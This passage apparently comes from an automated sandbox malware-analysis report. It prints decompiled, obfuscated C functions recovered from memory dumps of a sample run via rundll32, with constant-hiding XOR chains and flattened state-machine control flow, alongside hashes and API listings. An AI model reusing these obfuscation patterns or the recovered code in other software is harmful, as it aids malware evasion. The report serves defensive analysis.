                                                                                                                      				_v20 = _v20 << 9;
                                                                                                                      				_v20 = _v20 >> 0xf;
                                                                                                                      				_v20 = _v20 ^ 0x0003fa93;
                                                                                                                      				_v12 = 0x960758;
                                                                                                                      				_v12 = _v12 ^ 0x64ee01f0;
                                                                                                                      				_v12 = _v12 | 0x3d3dd2ba;
                                                                                                                      				_v12 = _v12 << 7;
                                                                                                                      				_v12 = _v12 ^ 0xbeed48c5;
                                                                                                                      				_v80 = 0xba0fdf;
                                                                                                                      				_v80 = _v80 + 0xfd2d;
                                                                                                                      				_v80 = _v80 ^ 0x00b93168;
                                                                                                                      				_v60 = 0x5f834c;
                                                                                                                      				_v60 = _v60 ^ 0x963b7b6a;
                                                                                                                      				_t215 = 0x3f;
                                                                                                                      				_v60 = _v60 * 0x3e;
                                                                                                                      				_v60 = _v60 ^ 0x6c73d449;
                                                                                                                      				_v76 = 0x4b89c6;
                                                                                                                      				_v76 = _v76 >> 6;
                                                                                                                      				_v76 = _v76 ^ 0x0008f57a;
                                                                                                                      				_v52 = 0x3d488e;
                                                                                                                      				_v52 = _v52 << 6;
                                                                                                                      				_v52 = _v52 << 8;
                                                                                                                      				_v52 = _v52 ^ 0x5226582a;
                                                                                                                      				_v44 = 0x8cf369;
                                                                                                                      				_v44 = _v44 ^ 0x25329c0c;
                                                                                                                      				_v44 = _v44 / _t215;
                                                                                                                      				_v44 = _v44 >> 0xe;
                                                                                                                      				_v44 = _v44 ^ 0x0005c7da;
                                                                                                                      				_t216 =  *0x6a3e10; // 0x0
                                                                                                                      				_t203 = E0068B6CF(_t216 + 0x1c, _v32, _v16, _v40);
                                                                                                                      				_t241 = _a4 + 0x2c;
                                                                                                                      				_t204 = E0068B23C(_v68, _v48, _a4 + 0x2c, _v24, _v72, _t203);
                                                                                                                      				_t248 = _t204;
                                                                                                                      				if(_t204 != 0) {
                                                                                                                      					_push(_v64);
                                                                                                                      					_push(_v8);
                                                                                                                      					_t207 = E0069DCF7(_v56, 0x681000, _t248);
                                                                                                                      					_pop(_t221);
                                                                                                                      					E006847CE( *((intOrPtr*)(_a8 + 0x18)), _v36, _t221, _v28, _v20, _t207, _t241, _v12, _v80);
                                                                                                                      					E0068A8B0(_v60, _t207, _v76);
                                                                                                                      					E00691F8A(_v52, _v44,  &_v608);
                                                                                                                      				}
                                                                                                                      				return 1;
                                                                                                                      			}

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: lstrcmpi
                                                                                                                      • String ID: *X&R$0M*$7m_$@!x
                                                                                                                      • API String ID: 1586166983-4050865940
                                                                                                                      • Opcode ID: f2083dd505e262dd827e8649ca072e3fbfcb04e3b0148b53eb846bab85f69218
                                                                                                                      • Instruction ID: b025aa5f522d44901eabc8aedb3e4d0c3fb99ff25fce30d2516244ea4169a77b
                                                                                                                      • Opcode Fuzzy Hash: f2083dd505e262dd827e8649ca072e3fbfcb04e3b0148b53eb846bab85f69218
                                                                                                                      • Instruction Fuzzy Hash: 10810271C0121DEBCF49DFA1D88A8EEBBB2FB44718F208118E411B6260D7B55A4ACF54
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 92%
                                                                                                                      			E0068EA99(void* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                      				signed int _v4;
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				void* _t136;
                                                                                                                      				signed int _t147;
                                                                                                                      				void* _t150;
                                                                                                                      				intOrPtr* _t152;
                                                                                                                      				void* _t154;
                                                                                                                      				void* _t165;
                                                                                                                      				signed int _t166;
                                                                                                                      				signed int _t167;
                                                                                                                      				signed int* _t171;
                                                                                                                      
                                                                                                                      				_push(_a16);
                                                                                                                      				_t152 = __edx;
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E006920B9(_t136);
                                                                                                                      				_v52 = 0x4b44d9;
                                                                                                                      				_t171 =  &(( &_v68)[6]);
                                                                                                                      				_t165 = 0;
                                                                                                                      				_t154 = 0x40ad1f2;
                                                                                                                      				_t166 = 0x41;
                                                                                                                      				_v52 = _v52 * 0x5c;
                                                                                                                      				_v52 = _v52 ^ 0xd486af61;
                                                                                                                      				_v52 = _v52 ^ 0xcf8a129f;
                                                                                                                      				_v24 = 0x8b17cc;
                                                                                                                      				_v24 = _v24 + 0xffff02b5;
                                                                                                                      				_v24 = _v24 ^ 0x008a1a91;
                                                                                                                      				_v64 = 0xcc4e1;
                                                                                                                      				_v64 = _v64 ^ 0x71537a57;
                                                                                                                      				_v64 = _v64 | 0xbc84d226;
                                                                                                                      				_v64 = _v64 + 0x8a58;
                                                                                                                      				_v64 = _v64 ^ 0xbde0890e;
                                                                                                                      				_v12 = 0x10173e;
                                                                                                                      				_v12 = _v12 / _t166;
                                                                                                                      				_v12 = _v12 ^ 0x000bb2e7;
                                                                                                                      				_v16 = 0xcbf18d;
                                                                                                                      				_v16 = _v16 + 0x7f8c;
                                                                                                                      				_v16 = _v16 ^ 0x00cd0dea;
                                                                                                                      				_v20 = 0x7a67ce;
                                                                                                                      				_v20 = _v20 << 1;
                                                                                                                      				_v20 = _v20 ^ 0x00fa626e;
                                                                                                                      				_v68 = 0x7779f8;
                                                                                                                      				_v68 = _v68 + 0xa85e;
                                                                                                                      				_v68 = _v68 << 0x10;
                                                                                                                      				_v68 = _v68 >> 3;
                                                                                                                      				_v68 = _v68 ^ 0x0443aeb4;
                                                                                                                      				_v28 = 0xee6391;
                                                                                                                      				_v28 = _v28 ^ 0x2bfa2339;
                                                                                                                      				_v28 = _v28 ^ 0x2b1bacd2;
                                                                                                                      				_v32 = 0x87b642;
                                                                                                                      				_v32 = _v32 + 0xffff3baa;
                                                                                                                      				_v32 = _v32 ^ 0x008fda80;
                                                                                                                      				_v36 = 0x3b697f;
                                                                                                                      				_v36 = _v36 | 0x5675f49c;
                                                                                                                      				_v36 = _v36 ^ 0x5679bffa;
                                                                                                                      				_v40 = 0x254a84;
                                                                                                                      				_v40 = _v40 * 0x67;
                                                                                                                      				_v40 = _v40 ^ 0x0f0bd396;
                                                                                                                      				_v44 = 0xfc206d;
                                                                                                                      				_v44 = _v44 * 0x45;
                                                                                                                      				_v44 = _v44 ^ 0x43f6aa11;
                                                                                                                      				_v56 = 0x3dd941;
                                                                                                                      				_v56 = _v56 ^ 0x94d2d45c;
                                                                                                                      				_v56 = _v56 >> 9;
                                                                                                                      				_v56 = _v56 ^ 0x00419011;
                                                                                                                      				_v4 = 0xdcf5c3;
                                                                                                                      				_v4 = _v4 ^ 0x0d464ae6;
                                                                                                                      				_v4 = _v4 ^ 0x0d938ce3;
                                                                                                                      				_v60 = 0xe23f0;
                                                                                                                      				_v60 = _v60 ^ 0x0435e191;
                                                                                                                      				_v60 = _v60 ^ 0xbde67646;
                                                                                                                      				_v60 = _v60 ^ 0xb922f804;
                                                                                                                      				_v60 = _v60 ^ 0x00f2260b;
                                                                                                                      				_v8 = 0x523a90;
                                                                                                                      				_v8 = _v8 * 0x75;
                                                                                                                      				_v8 = _v8 ^ 0x259e6962;
                                                                                                                      				_v48 = 0x46565e;
                                                                                                                      				_t167 = 3;
                                                                                                                      				_v48 = _v48 * 0x6a;
                                                                                                                      				_t168 = _v4;
                                                                                                                      				_v48 = _v48 / _t167;
                                                                                                                      				_v48 = _v48 ^ 0x09b4f31e;
                                                                                                                      				do {
                                                                                                                      					while(_t154 != 0x40ad1f2) {
                                                                                                                      						if(_t154 == 0x458d12f) {
                                                                                                                      							_t147 = E00688F65(_v12, _v16, _a12, _v20, _v24, _t154, _v64, _v68, _v52, _v28, _t154, 0);
                                                                                                                      							_t168 = _t147;
                                                                                                                      							_t171 =  &(_t171[0xa]);
                                                                                                                      							if(_t147 != 0xffffffff) {
                                                                                                                      								_t154 = 0x4af2a99;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      						} else {
                                                                                                                      							if(_t154 == 0x4af2a99) {
                                                                                                                      								_t150 = E006819B8(_t154, _v36,  *((intOrPtr*)(_t152 + 4)), _v40, _t168, _v44, _v56, _t152 + 4,  *_t152);
                                                                                                                      								_t171 =  &(_t171[8]);
                                                                                                                      								_t165 = _t150;
                                                                                                                      								_t154 = 0xe5b5021;
                                                                                                                      								continue;
                                                                                                                      							} else {
                                                                                                                      								if(_t154 != 0xe5b5021) {
                                                                                                                      									goto L11;
                                                                                                                      								} else {
                                                                                                                      									E00691E67(_v4, _v60, _v8, _v48, _t168);
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L6:
                                                                                                                      						return _t165;
                                                                                                                      					}
                                                                                                                      					_t154 = 0x458d12f;
                                                                                                                      					L11:
                                                                                                                      				} while (_t154 != 0xd2f352d);
                                                                                                                      				goto L6;
                                                                                                                      			}
                                                                                                                      0x0068ed6b
                                                                                                                      0x0068ed6d
                                                                                                                      0x0068ed6d
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: -5/$WzSq$^VF$JF
                                                                                                                      • API String ID: 0-2399144359
                                                                                                                      • Opcode ID: 1a99258aef2ebd0cedbce0666f862dafcadd34ac8b3dd1b99f29c3393997e72b
                                                                                                                      • Instruction ID: da895376754ad924504928e0475bae77b13e8f68f623a5037dded88d53232869
                                                                                                                      • Opcode Fuzzy Hash: 1a99258aef2ebd0cedbce0666f862dafcadd34ac8b3dd1b99f29c3393997e72b
                                                                                                                      • Instruction Fuzzy Hash: C07122714083419BC758DF65C98681BBBF2FBC9758F504A1DF69696220C3B2DA48DF83
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E00699BCF() {
                                                                                                                      				char _v520;
                                                                                                                      				signed int _v524;
                                                                                                                      				signed int _v528;
                                                                                                                      				signed int _v532;
                                                                                                                      				signed int _v536;
                                                                                                                      				unsigned int _v540;
                                                                                                                      				signed int _v544;
                                                                                                                      				signed int _v548;
                                                                                                                      				signed int _v552;
                                                                                                                      				signed int _v556;
                                                                                                                      				signed int _v560;
                                                                                                                      				signed int _v564;
                                                                                                                      				signed int _v568;
                                                                                                                      				signed int _t111;
                                                                                                                      				signed int _t115;
                                                                                                                      				signed int _t117;
                                                                                                                      				void* _t118;
                                                                                                                      				signed int _t132;
                                                                                                                      				void* _t134;
                                                                                                                      				signed int _t135;
                                                                                                                      				signed int* _t136;
                                                                                                                      
                                                                                                                      				_t136 =  &_v568;
                                                                                                                      				_v560 = 0x297e3c;
                                                                                                                      				_v560 = _v560 >> 9;
                                                                                                                      				_t118 = 0x4ead2fe;
                                                                                                                      				_v560 = _v560 + 0xe8be;
                                                                                                                      				_v560 = _v560 ^ 0xc9c09221;
                                                                                                                      				_v560 = _v560 ^ 0xc9c20db8;
                                                                                                                      				_v540 = 0x190e1d;
                                                                                                                      				_v540 = _v540 >> 7;
                                                                                                                      				_v540 = _v540 >> 0xd;
                                                                                                                      				_v540 = _v540 ^ 0x000cdd3b;
                                                                                                                      				_v544 = 0x86c2f0;
                                                                                                                      				_v544 = _v544 | 0x0d7eac20;
                                                                                                                      				_v544 = _v544 ^ 0xe6b61282;
                                                                                                                      				_v544 = _v544 ^ 0xeb41e563;
                                                                                                                      				_v552 = 0x262f60;
                                                                                                                      				_v552 = _v552 ^ 0x76c91adc;
                                                                                                                      				_v552 = _v552 + 0xd1c5;
                                                                                                                      				_v552 = _v552 ^ 0x76fc323e;
                                                                                                                      				_v524 = 0xf427e0;
                                                                                                                      				_v524 = _v524 + 0xffff22a3;
                                                                                                                      				_v524 = _v524 ^ 0x00f85f52;
                                                                                                                      				_v548 = 0xdbc1a5;
                                                                                                                      				_v548 = _v548 >> 0xb;
                                                                                                                      				_v548 = _v548 + 0xf615;
                                                                                                                      				_v548 = _v548 ^ 0x0006ff3e;
                                                                                                                      				_v556 = 0xd2f840;
                                                                                                                      				_v556 = _v556 * 0x5f;
                                                                                                                      				_t134 = 0;
                                                                                                                      				_v556 = _v556 ^ 0x4e4cccaa;
                                                                                                                      				_v568 = 0x74ecfa;
                                                                                                                      				_t132 = 0x53;
                                                                                                                      				_t133 = _v556;
                                                                                                                      				_v568 = _v568 / _t132;
                                                                                                                      				_v568 = _v568 ^ 0xc72664ff;
                                                                                                                      				_v568 = _v568 << 0xf;
                                                                                                                      				_v568 = _v568 ^ 0x862d9f40;
                                                                                                                      				_v536 = 0xc0d44a;
                                                                                                                      				_v536 = _v536 + 0x396d;
                                                                                                                      				_t135 = _v556;
                                                                                                                      				_t117 = _v556;
                                                                                                                      				_v536 = _v536 * 0x46;
                                                                                                                      				_v536 = _v536 ^ 0x34c6c601;
                                                                                                                      				_v532 = 0xf37e83;
                                                                                                                      				_v532 = _v532 << 8;
                                                                                                                      				_v532 = _v532 | 0x760e0a19;
                                                                                                                      				_v532 = _v532 ^ 0xf77c332a;
                                                                                                                      				_v528 = 0x91f8e3;
                                                                                                                      				_v528 = _v528 ^ 0xc904aca2;
                                                                                                                      				_v528 = _v528 ^ 0xc9900919;
                                                                                                                      				do {
                                                                                                                      					while(_t118 != 0x27fe330) {
                                                                                                                      						if(_t118 == 0x4ead2fe) {
                                                                                                                      							_t118 = 0x96d401d;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							if(_t118 == 0x7ac597b) {
                                                                                                                      								_t117 = E0068B6CF( &_v520, _v548, _v556, _v568);
                                                                                                                      								_t118 = 0xa7595e6;
                                                                                                                      								continue;
                                                                                                                      							} else {
                                                                                                                      								if(_t118 == 0x80b0e4e) {
                                                                                                                      									_t90 =  &_v552; // 0xeb41e563
                                                                                                                      									_t111 = E00689B83(_t133, __eflags, _v544,  *_t90,  &_v520, _v524);
                                                                                                                      									_t136 =  &(_t136[4]);
                                                                                                                      									__eflags = _t111;
                                                                                                                      									if(__eflags != 0) {
                                                                                                                      										_t118 = 0x7ac597b;
                                                                                                                      										continue;
                                                                                                                      									}
                                                                                                                      								} else {
                                                                                                                      									if(_t118 == 0x96d401d) {
                                                                                                                      										_t115 = E006852C2();
                                                                                                                      										_t133 = _t115;
                                                                                                                      										__eflags = _t115;
                                                                                                                      										if(__eflags != 0) {
                                                                                                                      											_t118 = 0x80b0e4e;
                                                                                                                      											continue;
                                                                                                                      										}
                                                                                                                      									} else {
                                                                                                                      										if(_t118 != 0xa7595e6) {
                                                                                                                      											goto L15;
                                                                                                                      										} else {
                                                                                                                      											_t135 = E00682051(_v532, _t117, _v528);
                                                                                                                      											_t118 = 0x27fe330;
                                                                                                                      											continue;
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						goto L16;
                                                                                                                      					}
                                                                                                                      					_v564 = 0x69bdc3;
                                                                                                                      					_v564 = _v564 | 0xfd1bce6c;
                                                                                                                      					_v564 = _v564 ^ 0xf153ffb6;
                                                                                                                      					_v564 = _v564 ^ 0x260f00bb;
                                                                                                                      					__eflags = _t135 - _v564;
                                                                                                                      					_t134 = (_t135 == _v564) ? 1 : _t134;
                                                                                                                      					_t118 = 0x8b668cc;
                                                                                                                      					L15:
                                                                                                                      					__eflags = _t118 - 0x8b668cc;
                                                                                                                      				} while (__eflags != 0);
                                                                                                                      				L16:
                                                                                                                      				return _t134;
                                                                                                                      			}
                                                                                                                      0x00000000
                                                                                                                      0x00699daf
                                                                                                                      0x00699d6f
                                                                                                                      0x00699d75
                                                                                                                      0x00000000
                                                                                                                      0x00699d7b
                                                                                                                      0x00699d8f
                                                                                                                      0x00699d91
                                                                                                                      0x00000000
                                                                                                                      0x00699d91
                                                                                                                      0x00699d75
                                                                                                                      0x00699d6d
                                                                                                                      0x00699d65
                                                                                                                      0x00699d59
                                                                                                                      0x00000000
                                                                                                                      0x00699d4d
                                                                                                                      0x00699e0c
                                                                                                                      0x00699e16
                                                                                                                      0x00699e1f
                                                                                                                      0x00699e27
                                                                                                                      0x00699e33
                                                                                                                      0x00699e35
                                                                                                                      0x00699e38
                                                                                                                      0x00699e3d
                                                                                                                      0x00699e3d
                                                                                                                      0x00699e3d
                                                                                                                      0x00699e4a
                                                                                                                      0x00699e55

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: <~)$`/&$cA$m9
                                                                                                                      • API String ID: 0-2671356241
                                                                                                                      • Opcode ID: 0357c323211fbb2750b6ff63dd811012db8b592bb5a4c14c508bc9731e28ab86
                                                                                                                      • Instruction ID: 8b7fab387357c2f20dac821a7ff439ed79f79cc0f6a0a3ef175d01a7daee2e89
                                                                                                                      • Opcode Fuzzy Hash: 0357c323211fbb2750b6ff63dd811012db8b592bb5a4c14c508bc9731e28ab86
                                                                                                                      • Instruction Fuzzy Hash: 4651757100C3019FC788CE25D09642BBBE2FFD8758F501E1EF5A692660C774CA0A8FA2
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 82%
                                                                                                                      			E00689B83(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                      				unsigned int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				char _v52;
                                                                                                                      				void* _v64;
                                                                                                                      				intOrPtr _v68;
                                                                                                                      				void* _t115;
                                                                                                                      				signed int _t130;
                                                                                                                      				signed int _t131;
                                                                                                                      				void* _t133;
                                                                                                                      
                                                                                                                      				_push(_a16);
                                                                                                                      				_push(_a12);
                                                                                                                      				_v52 = 0x104;
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(0x104);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E006920B9(0x104);
                                                                                                                      				_v68 = 0x342964;
                                                                                                                      				asm("stosd");
                                                                                                                      				_t133 = 0;
                                                                                                                      				asm("stosd");
                                                                                                                      				asm("stosd");
                                                                                                                      				_v40 = 0xa3a3c;
                                                                                                                      				_v40 = _v40 + 0x2c25;
                                                                                                                      				_v40 = _v40 ^ 0x000a7661;
                                                                                                                      				_v16 = 0x75ee44;
                                                                                                                      				_t130 = 0x7a;
                                                                                                                      				_v16 = _v16 / _t130;
                                                                                                                      				_v16 = _v16 ^ 0xc9e42672;
                                                                                                                      				_v16 = _v16 ^ 0xc9e58a7e;
                                                                                                                      				_v8 = 0x386b92;
                                                                                                                      				_v8 = _v8 << 4;
                                                                                                                      				_v8 = _v8 | 0x0ec9a536;
                                                                                                                      				_v8 = _v8 >> 0xf;
                                                                                                                      				_v8 = _v8 ^ 0x000b4478;
                                                                                                                      				_v44 = 0xd66787;
                                                                                                                      				_v44 = _v44 >> 3;
                                                                                                                      				_v44 = _v44 ^ 0x001d593f;
                                                                                                                      				_v24 = 0x7c5a73;
                                                                                                                      				_v24 = _v24 | 0xae316990;
                                                                                                                      				_t131 = 0x19;
                                                                                                                      				_v24 = _v24 / _t131;
                                                                                                                      				_v24 = _v24 ^ 0x06f0967a;
                                                                                                                      				_v20 = 0x3dfd52;
                                                                                                                      				_v20 = _v20 >> 8;
                                                                                                                      				_v20 = _v20 * 0x24;
                                                                                                                      				_v20 = _v20 ^ 0x0009affd;
                                                                                                                      				_v12 = 0xf0c6a5;
                                                                                                                      				_v12 = _v12 + 0xffff2be4;
                                                                                                                      				_v12 = _v12 + 0x1686;
                                                                                                                      				_v12 = _v12 << 2;
                                                                                                                      				_v12 = _v12 ^ 0x03c3840c;
                                                                                                                      				_v48 = 0x30c967;
                                                                                                                      				_v48 = _v48 | 0xcae095b2;
                                                                                                                      				_v48 = _v48 ^ 0xcaf7f966;
                                                                                                                      				_v36 = 0xabcbdc;
                                                                                                                      				_v36 = _v36 + 0xfffff856;
                                                                                                                      				_v36 = _v36 | 0xb2b71321;
                                                                                                                      				_v36 = _v36 ^ 0xb2b3c312;
                                                                                                                      				_v32 = 0xda8dbe;
                                                                                                                      				_v32 = _v32 + 0xffff364b;
                                                                                                                      				_v32 = _v32 | 0x02598b37;
                                                                                                                      				_v32 = _v32 ^ 0x02d31c0a;
                                                                                                                      				_v28 = 0x528ee8;
                                                                                                                      				_v28 = _v28 * 0x12;
                                                                                                                      				_v28 = _v28 << 2;
                                                                                                                      				_v28 = _v28 ^ 0x17383776;
                                                                                                                      				_t115 = E006891DD(__ecx, _v40, __ecx);
                                                                                                                      				_t132 = _t115;
                                                                                                                      				if(_t115 != 0) {
                                                                                                                      					_t133 = E006876AA(_a12,  &_v52, _v44, _v24, __ecx, _v20, _t132, _v12);
                                                                                                                      					E00691E67(_v48, _v36, _v32, _v28, _t132);
                                                                                                                      				}
                                                                                                                      				return _t133;
                                                                                                                      			}






















                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Du$av$d)4$sZ|
                                                                                                                      • API String ID: 0-269012183
                                                                                                                      • Opcode ID: dfc967cf0c468e8d72dd3f4d8ef6424ad64969c011c2b846f478a6ab0dae1b6b
                                                                                                                      • Instruction ID: 4b99a67766652a644953cdf12cd172b258ef2a8357da38dc02326de1140532b9
                                                                                                                      • Opcode Fuzzy Hash: dfc967cf0c468e8d72dd3f4d8ef6424ad64969c011c2b846f478a6ab0dae1b6b
                                                                                                                      • Instruction Fuzzy Hash: 1E5112B1D00209EBDF09DFE5C94A8EEFBB1FB48318F108158E412B6260D3755A58DFA4
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetThreadLocale.KERNEL32 ref: 10043743
                                                                                                                      • GetLocaleInfoA.KERNEL32(00000000,00001004,?,00000007), ref: 10043755
                                                                                                                      • GetACP.KERNEL32 ref: 1004377E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Locale$InfoThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4232894706-0
                                                                                                                      • Opcode ID: 138607bedea967b7fe84d9a3997690d852697f2840ddf7cd3550f999a21f7b57
                                                                                                                      • Instruction ID: 788673dfdacf9fce6eb7172e6dd538a5e2a4211a9e61a4e82855ee0bc522c5dc
                                                                                                                      • Opcode Fuzzy Hash: 138607bedea967b7fe84d9a3997690d852697f2840ddf7cd3550f999a21f7b57
                                                                                                                      • Instruction Fuzzy Hash: 8AF0C871E04238ABE715DBA489955EFB7E4EB09A81B11816CD981E7251EA206D0487C9
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: fb0f3e1e5a18f2ff69a806334b974a9f52d4ac6ab5fd56aeff2c93c24eadb245
                                                                                                                      • Instruction ID: 3e933570e0ddfcbf732aafa8bdad2c1db21bb76b11c706ff9f14b0ef8e609435
                                                                                                                      • Opcode Fuzzy Hash: fb0f3e1e5a18f2ff69a806334b974a9f52d4ac6ab5fd56aeff2c93c24eadb245
                                                                                                                      • Instruction Fuzzy Hash: 63F03731505119EBDF01DF70CD48AAE3FA9FB04284F008020FD09D9060EB31EB95EBA1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 83%
                                                                                                                      			E00690E53(void* __ecx) {
                                                                                                                      				char _v520;
                                                                                                                      				char _v1040;
                                                                                                                      				char _v1560;
                                                                                                                      				char _v2080;
                                                                                                                      				char _v2600;
                                                                                                                      				signed int _v2604;
                                                                                                                      				signed int _v2608;
                                                                                                                      				signed int _v2612;
                                                                                                                      				signed int _v2616;
                                                                                                                      				signed int _v2620;
                                                                                                                      				signed int _v2624;
                                                                                                                      				signed int _v2628;
                                                                                                                      				signed int _v2632;
                                                                                                                      				signed int _v2636;
                                                                                                                      				signed int _v2640;
                                                                                                                      				signed int _v2644;
                                                                                                                      				signed int _v2648;
                                                                                                                      				signed int _v2652;
                                                                                                                      				signed int _v2656;
                                                                                                                      				signed int _v2660;
                                                                                                                      				signed int _v2664;
                                                                                                                      				signed int _v2668;
                                                                                                                      				signed int _v2672;
                                                                                                                      				signed int _v2676;
                                                                                                                      				signed int _v2680;
                                                                                                                      				signed int _v2684;
                                                                                                                      				signed int _v2688;
                                                                                                                      				signed int _v2692;
                                                                                                                      				signed int _v2696;
                                                                                                                      				signed int _v2700;
                                                                                                                      				signed int _v2704;
                                                                                                                      				signed int _v2708;
                                                                                                                      				signed int _v2712;
                                                                                                                      				signed int _v2716;
                                                                                                                      				signed int _v2720;
                                                                                                                      				signed int _v2724;
                                                                                                                      				signed int _v2728;
                                                                                                                      				signed int _v2732;
                                                                                                                      				signed int _v2736;
                                                                                                                      				signed int _v2740;
                                                                                                                      				signed int _v2744;
                                                                                                                      				signed int _v2748;
                                                                                                                      				signed int _v2752;
                                                                                                                      				signed int _v2756;
                                                                                                                      				signed int _v2760;
